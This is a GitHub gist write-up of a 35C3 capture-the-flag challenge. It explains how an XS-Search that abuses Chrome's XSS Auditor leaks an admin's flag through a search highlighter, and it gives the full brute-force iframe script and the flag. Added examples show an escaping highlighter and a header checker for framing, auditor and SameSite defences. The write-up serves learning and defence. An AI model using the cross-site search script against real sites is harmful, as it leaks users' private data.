l4wio/go.html Secret

Last active September 3, 2019 01:38
Briefly, we all know that the flag is stored as a `file` in the admin account, and that the flag has the format `35C3_***`.
When we search the content of a file and the term exists, a script highlights the found word in yellow with a `<mark>` element.
For example:
```js
// The challenge's highlighter (closing brace restored): the search term q is
// located inside each <pre> and re-inserted via innerHTML wrapped in <mark>.
for (let pre of document.getElementsByTagName('pre')) {
  let text = pre.innerHTML;
  let q = 'def';   // the search term, rendered into the page by the server
  let idx = text.indexOf(q);
  pre.innerHTML = `${text.substr(0, idx)}<mark>${q}</mark>${text.substr(idx+q.length)}`;
}
```
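The highlighter above builds markup with `innerHTML` from the raw term. As an added example (not code from the gist or the challenge), here is a version that escapes both the file content and the term before wrapping matches in `<mark>`, so the result does not depend on what the server put into `q`; it also marks every occurrence rather than only the first. The names `escapeHtml` and `highlightSafe` are assumptions.

```javascript
// Added example (not from the gist): a highlighter that never feeds the
// file content or the search term into innerHTML unescaped.
// escapeHtml and highlightSafe are names chosen for this example.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Returns HTML in which every occurrence of q in text is wrapped in <mark>.
// Both text and q are escaped first, so neither can contribute markup.
function highlightSafe(text, q) {
  if (!q) return escapeHtml(text);   // empty term: nothing to mark
  const parts = [];
  let from = 0;
  for (;;) {
    const idx = text.indexOf(q, from);
    if (idx === -1) break;
    parts.push(escapeHtml(text.slice(from, idx)));
    parts.push('<mark>' + escapeHtml(q) + '</mark>');
    from = idx + q.length;
  }
  parts.push(escapeHtml(text.slice(from)));
  return parts.join('');
}

// Browser usage (skipped under Node): read the term from the query string and
// highlight the text content of each <pre>, assigning only escaped output.
if (typeof document !== 'undefined') {
  const q = new URLSearchParams(location.search).get('q') || '';
  for (const pre of document.getElementsByTagName('pre')) {
    pre.innerHTML = highlightSafe(pre.textContent, q);
  }
}
```

Note that `highlightSafe` works on `textContent`, not on `innerHTML`, so the index it computes refers to the visible text and cannot land inside an existing tag.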
Okay, now let's go to the XSS Auditor part.
Try this on Chrome (yes, we should, since the description says that the admin is using headless Chrome).
You can see the red alert, which means that the XSS Auditor found an XSS vector in our URL (the `a` param) that also shows up in the page's content. But in fact it is *NOT XSS*; this is a side effect of the auditor.
We leverage this mechanism to detect whether there is a search result (a correct flag guess) or not.
* To clarify: `a` is just a dummy parameter name; we only want the XSS Auditor to treat its value as an XSS vector.
But how do we do that? When the XSS Auditor detects the vector, it blocks the page and redirects it to `chrome-error://chromewebdata/`.
Now the trick comes in. By reading this post:
I found out that it's possible to detect whether the browser redirected to another page.
Yep, and that's all.
We can guess the flag character by character by performing an XS-Search that leverages the XSS Auditor:
```js
// The dummy `a` param carries a URL-encoded copy of the highlighter script, which is
// only in the response when the search hits, so the auditor blocks exactly the hits.
// The challenge host and search path before {{search}} are omitted in the original.
var URL = '{{search}}&a=%3Cscript%3E%20%20%20%20%28%28%29%3d%3E%7b%0a%20%20%20%20%20%20for%20%28let%20pre%20of%20document%2egetElementsByTagName%28%27pre%27%29%29%20%7b%0a%20%20%20%20%20%20%20%20let%20text%20%3d%20pre%2einnerHTML%3b';
var charset = '_abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\\]^`{|}~';
var brute = new URLSearchParams(location.search).get('brute') || '35C3_'; // resume from ?brute=
function guess(i){
  var go = brute + charset[i];
  var x = document.createElement('iframe');
  x.name = 'blah';   // property name lost in extraction; reconstructed
  var calls = 0;
  x.onload = () => {
    calls++;
    if(calls > 1){
      // 2nd onload: the XSS auditor blocked this and the page was redirected to chrome-error://
      console.log("GOT IT ==> ", go);
      location.href = ''+escape(go);   // destination left empty in the original
      x.onload = ()=>{};
      return;
    }
    // 1st onload: re-navigate the frame to its URL plus '#'. On the real page that is a
    // same-document fragment jump (no load event); on chrome-error:// it is a full
    // navigation, so a 2nd onload means the search hit. (target/click reconstructed)
    var anchor = document.createElement('a');
    anchor.target = x.name;
    anchor.href = x.src+'#';
    anchor.click();
    anchor = null;
  };
  x.src = URL.replace('{{search}}',go);
  document.body.appendChild(x);   // reconstructed
  setTimeout(() =>{   // continuation lost in extraction; reconstructed: try the next character
    x.remove();
    if (i + 1 < charset.length) guess(i + 1);
  }, 1000);
}
// FLAG: 35C3_xss_auditor_for_the_win
```
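Seen from the defender's side, the leak needs three things: the search page must be loadable in a cross-site iframe, the victim's session cookie must ride along on that load, and the auditor's block-and-redirect must be observable (Chrome removed the XSS Auditor in version 78, so the last part is now only a concern for old builds). As an added example that is not part of the gist, here is a small Node script that checks a captured response header block for the corresponding defences; `parseHeaders`, `assessXsLeakDefences` and both sample responses are constructed for this example.

```javascript
// Added example (not from the gist): check a captured HTTP response header
// block for the defences that blunt this kind of auditor/iframe XS-Search.
// parseHeaders, assessXsLeakDefences and both sample responses are constructed.
function parseHeaders(raw) {
  const headers = {};
  for (const line of raw.split(/\r?\n/)) {
    const m = line.match(/^([^:\s]+):\s*(.*)$/);
    if (!m) continue;                                          // status line, blank lines
    const name = m[1].toLowerCase();
    (headers[name] = headers[name] || []).push(m[2].trim());   // Set-Cookie may repeat
  }
  return headers;
}

// Returns a list of findings; an empty list means all three checks passed.
function assessXsLeakDefences(raw) {
  const h = parseHeaders(raw);
  const findings = [];
  const csp = (h['content-security-policy'] || []).join(';').toLowerCase();
  const xfo = (h['x-frame-options'] || []).join(',').toLowerCase();
  // 1. The leak loads the search page inside an attacker-controlled iframe.
  if (!/frame-ancestors/.test(csp) && !/deny|sameorigin/.test(xfo)) {
    findings.push('framable: no frame-ancestors directive and no X-Frame-Options header');
  }
  // 2. X-XSS-Protection: 0 switched the legacy auditor off in the Chrome versions that had it.
  const xxp = h['x-xss-protection'];
  if (!xxp || !/^0\s*$/.test(xxp[0])) {
    findings.push('X-XSS-Protection is not 0: legacy XSS Auditor stays active and its block is observable');
  }
  // 3. Without SameSite, the session cookie is sent on the cross-site iframe load,
  //    so the search runs with the victim's files.
  for (const c of h['set-cookie'] || []) {
    if (!/;\s*samesite=(lax|strict)\b/i.test(c)) {
      findings.push('cookie without SameSite=Lax/Strict: ' + c.split('=')[0]);
    }
  }
  return findings;
}

// Constructed sample responses: the weak one resembles the challenge as described,
// the hardened one adds the three headers.
const WEAK_RESPONSE = [
  'HTTP/1.1 200 OK',
  'Content-Type: text/html; charset=utf-8',
  'Set-Cookie: session=abc123; Path=/; HttpOnly',
  '',
].join('\r\n');

const HARDENED_RESPONSE = [
  'HTTP/1.1 200 OK',
  'Content-Type: text/html; charset=utf-8',
  "Content-Security-Policy: default-src 'self'; frame-ancestors 'none'",
  'X-Frame-Options: DENY',
  'X-XSS-Protection: 0',
  'Set-Cookie: session=abc123; Path=/; HttpOnly; Secure; SameSite=Lax',
  '',
].join('\r\n');

console.log('weak    :', assessXsLeakDefences(WEAK_RESPONSE));
console.log('hardened:', assessXsLeakDefences(HARDENED_RESPONSE));
```

`SameSite=Lax` is enough here because an iframe load is not a top-level navigation, so Lax cookies are withheld from it; the frame-ancestors check alone would also stop this particular script, but the cookie and header checks close the same leak through other embedding tricks.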

Hic! Could you explain it in more detail, pro?? :)) Hoping for your guidance :v
